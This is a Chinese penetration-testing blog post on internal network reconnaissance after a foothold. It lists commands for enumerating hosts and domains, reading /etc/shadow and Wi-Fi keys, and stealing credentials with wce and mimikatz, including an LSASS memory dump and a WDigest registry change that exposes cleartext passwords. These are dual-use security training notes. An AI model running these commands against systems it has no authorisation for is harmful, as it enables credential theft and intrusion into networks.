内网信息收集

内网渗透——内网信息收集 渗透测试进入内网之后,首先要对所处的内网环境进行判断,有以下三个方面:对当前机器角色进行判断对当前机器所处网络环境及拓扑结构进行判断分析对当前机器所处区域进行判断。 阅读详情

本机信息收集
1.查询账户信息:
对当前主机的用户角色和用户权限做了解,判断是否需要进一步提升权限。

	win:whoami、net user 用户名
	linux:whoami、id、cat /etc/shadow、cat /etc/passwd

2.查询网络和端口信息
根据目的主机的IP地址/网络连接/相关网络地址,确认所连接的网络情况。

win:ipconfig、netstat -ano        
	ARP表:arp -a         
	路由表: route print        
	查看dns缓存记录命令:ipconfig/displaydns
linux:ifconfig、netstat -anplt        
	ARP表:arp -a / 
	路由表:route -n        
	查看登录日志获取登录来源ip

3.查询进程列表
查看本地运行的所有进程,确认本地软件运行情况,重点可以关注安全软件。

	win:tasklist 
	linux: ps、 top

4.查询系统和补丁信息
获取当前主机的系统版本和补丁更新情况,可用来辅助提升权限。

win:
	systeminfo |findstr "KB" 查询系统信息/补丁安装情况。       
	wmic qfe get Caption,description,HotfixID,installedOn   //查询补丁信息,包含说明链接/补丁描述/KB编号/更新时间等信息       
	wmic qfe list full  查询全部信息
	wmic qfe list full /format:htable>c:\hotfixes.html                         //第三条命令导出html到指定位置
Linux: 通过查看内核版本 uname -a 或者使用rpm -qa来查询安装了哪些软件包

5.凭证收集
服务器端存有敏感信息,通过收集各种登录凭证以便扩大战果。

	Windows:本地密码Hash和明文密码/抓取浏览器密码/服务端明文密码
	linux:history记录敏感操作/shadow文件破解/mimipenguin抓取密码/使用Strace收集登录凭证/全盘搜索敏感信息

6.拓展
查看无线网密码

win:
		netsh wlan show profiles
		netsh wlan show profile name={填写上一条命令获取到的}” key=clear
linux:
		cd /etc/NetworkManager/system-connections
		随后查看文件夹下的文件即可

7.系统哈希或明文密码获取

1.wce
	使用wce这个获取密码,需要管理员权限
	wce -w

win8和server2012如果抓不出,在目标机修改注册表(CMD运行下命令)

 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1	
	2.mimikatz
	要以管理员身份运行,一般用在桌面环境。如果是终端条件,使用能以系统管理员身份运行的程序去调用mimikatz,执行以下两条命令就OK.
	privilege::debug
			sekurlsa::logonpasswords
3.mimikatz内存转储读取密码
	在任务管理器找到lsass进程,之后右击创建转储文件
	然后使用mimikatz加载导出来的内存再抓hash明文
	privilege::debug
	sekurlsa::minidump c:\users\ppbibo\appdata\local\temp\lsass.dmp
	sekurlsa::logonpasswords

域内信息收集
搜集完本机相关信息后,就需要判断当前主机是否在域内,如果在域内,就需要进一步收集域内信息
1.判断是否有域
一般域服务器都会同时作为时间服务器,所以使用下面命令判断主域

运行 net time /domain 该命令后,一般会有如下三种情况:
	1.存在域,但当前用户不是域用户,提示说明权限不够  
		C:\Users>bypass>net time /domain  发生系统错误 5   拒绝访问。
	2.存在域,并且当前用户是域用户   
		C:\Users\Administrator>net time /domain   \\dc.test.com 的当前时间是 2020/10/23 21:18:37 命令成功完成。
	3.当前网络环境为工作组,不存在域   
		C:\Users\Administrator>net time /domain   找不到域 WORKGROUP 的域控制器。

2.查找域管理员

	net user /domain //获取域用户列表
	net group /domain  //查询域内所有用户组列表
	net group “Domain Admins” /domain //查询域管理员用户
	net group "Domain Controllers" /domain  //查看域控制器
	net localgroup administrators /domain  //查询域内置本地管理员组用户

3.找到域控
一般来说,域控服务器IP地址为DNS服务器地址,找到DNS服务器地址就可以定位域控。

nslookup/ping 域名,解析到域控服务器IP地址
内网信息收集——基本信息收集 一般情况下,一个域的用户只能访问本域内的资源,无法访问其他域的资源,而要想不同域之间实现互访就需要建立信任关系。查看当前主机的操作系统信息,包括当前主机的主机名、操作系统版本、系统目录、所处的工作站(域或工作组)、各网卡信息、安装的补丁信息等。,查看当前主机的端口连接情况,包括当前主机的TCP、UDP等端口监听或开放状况,以及当前主机与网络中其他主机建立的连接情况。,查看当前主机与其他主机远程建立的网络共享连接。,查看当前主机与所连接的客户端主机之间的会话。,查看当前主机开启的共享列表。 阅读详情

相关推荐

【网络安全】内网介绍+windows信息收集(含命令)

渗透测试之内网介绍+windows信息收集(含命令)

你在看屏幕的同时,屏幕也在注视着你 4274

如何进行内网信息收集

渗透测试的本质是信息收集,我们可以将内网信息收集大致分为5个步骤,即本机信息收集、域内信息收集、登录凭证窃取、存活主机探测、内网端口扫描。最常见的两个问题就是: 我是谁? -- whoami 我在哪? -- ipconfig/ifconfig 当获取一台主机的管理员权限的时候,我们总是迫不及待想要去深入了解一下。 本机信息收集 1.查询账户信息:对当前主机的用户角色和用户权限...

2万+

内网渗透-内网信息收集

内网信息收集 文章目录内网信息收集前言msf模块中的信息收集msf反弹shell后的信息收集内网信息收集后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网的渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。 msf模块中的信息收集 Msf模块 run post/ run post/windo

lza20001103的博客 1万+

内网信息收集:Windows系统(收集内网计算机的所有信息 进行攻击.)

信息收集” 会对渗透测试工程师和网络安全工程师具有重大作用:在渗透测试人员 进入一个内网后,面对的是一片 “ 未知的区域 ”,所以 渗透测试人员首先会对当前所 处的网络环境进行判断,通常的判断分为三种. (1)我是谁?—— 对计算机的角色进行判断. (2)我在哪?—— 对目前机器所处位置区域的判断。 (3)这是哪?—— 对目前机器所处网络环境的拓扑结构进行分析和判断。

网络安全领域___专研者. 1万+

内网渗透之信息收集

内网信息收集 一、内网信息收集概述 渗透测试人员进人内网后,面对的是一片“黑暗森林”。所以,渗透测试人员首先需要对当前所处的网络环境进行判断。判断涉及如下三个方面。 我是谁?一对 当前机器角色的判断。 这是哪?一对 当前机器所处网络环境的拓扑结构进行分析和判断。 我在哪?一对 当前机器所处区域的判断。 对当前机器角色的判断,是指判断当前机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器、代理服务器、DNS服务器还是存储服务器等。具体的判断过程,是根据机器的主机名、文件、网络连接等情况综合完成

qq_48904485的博客 6883

内网信息收集(1)

进入内网后应该收集什么信息?1.指判断当前机器是普通WEB服务器、开发测试服务器、公共服务器、文件服务器、代理服务器、DNS服务器还是存储服务器等。具体的判断过程,是根据机器的主机名、文件、网络连接情况综合完成的。2.指对所处的内网进行全面的数据收集和分析整理,绘制出大致的内网整体拓扑结构图。3.指判断机器处于网络拓扑中的哪个区域,是DMZ、办公区还是核心区。当然,这里的区域不是绝对的,只是一个大概的环境。处于不同位置的网络,环境不一样,区域界限也不一定明显。

2301_80264342的博客 1054

内网信息收集1

使用nbtscan扫描本地或远程TCP/IP网络上开放的NetBIOS名称服务器 输出的结果第一列为IP地址,第二列为机器名和所在域的名称,第三列即最后一列为及其所开启的服务 的列表 Windows: nbtscan.exe –m 10.10.10.0/24 nbtstat –n Linux: nbtscan -r 10.10.10.0/24。安全域的划分:内网(核心区和办公区(一般能够访问DMZ)),DMZ(边界网络,作为安全系统和非安全系统之间的缓冲区,用于对外提供服务),外网。

dscn123的博客 1138

2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具

经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!

Libra1313的博客 1万+

内网信息收集(超级全)

内网信息收集 文章首发与奇安信攻防社区 https://forum.butian.net/share/236 简介 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质量,所以信息收集的重要性不容小觑,看得懂并不代表会,不如自己实操一遍,这里将提供一个单域的环境下载地址,进行信息收集。 单域环境 这张图为这次信息收集所搭建的单域内网环境。 工作组与域环境比较 工作组是一群计算机的集合,它仅仅是一个逻辑的集合,各自计算机还是各自管理的,你要访问其中的计算机,还是要

yggcwhat 1582

内网渗透】内网信息收集的十三种基本方式

本文的主题为基本的信息收集方式,,域内信息收集得再过几天看看,用的windows server 2019内核版本比较高,还有一些信息收集技巧行不通,比如检查杀毒软件情况,就不举例了。

xt350488的博客 1427

网络安全之域信息收集(一)

信息收集 本机信息 1.查询账户信息 对当前主机的用户角色和用户权限进一步了解,判断是否需要提权 DMZ普通用户需要提权到system用户,进行横向移动 2.查询网络和端口信息 根据目的主机的ip信息/网络连接/相关网络地址,初步确定网络状态 win:ipconfig, netstat -ano ARP路由表:arp -a 路由表:route print 查看dns缓存记录命令:ipconfig/displaydns linux:ifconfig, netstat -

qq_52074678的博客 655

内网渗透】内网信息收集的十三种基本方式,(非常详细)从零基础到精通,收藏这篇就够了!

本文的主题为基本的信息收集方式,不包含域内信息收集,域内信息收集得再过几天看看,本文用的windows server 2019内核版本比较高,还有一些信息收集技巧行不通,比如检查杀毒软件情况,就不举例了,文章仅供参考。

Python_0011的博客 1032

内网渗透信息收集总结

内网中通常会有大量网络安全系统和设备,IDS, IPS, 日志审计,安全网关,反病毒软件等。在一个域中,当计算机加入域之后,会默认给域管理员组赋予本地系统管理员权限。因此,域管理员组的成员均可访问本地计算机,且具有完全控制权限。定位域管理员渠道:日志:本地机器管理员日志,使用脚本或者Wevtuil工具导出查看。会话,域内每台机器的登录会话,netsess.exe, powerview 等工具查询。

2301_77732591的博客 2079
上一篇: [CISCN2019 华东南赛区]Double Secret
下一篇: [NPUCTF2020]ezinclude
Lhehe2020
博客等级 码龄9年 4粉丝 23原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值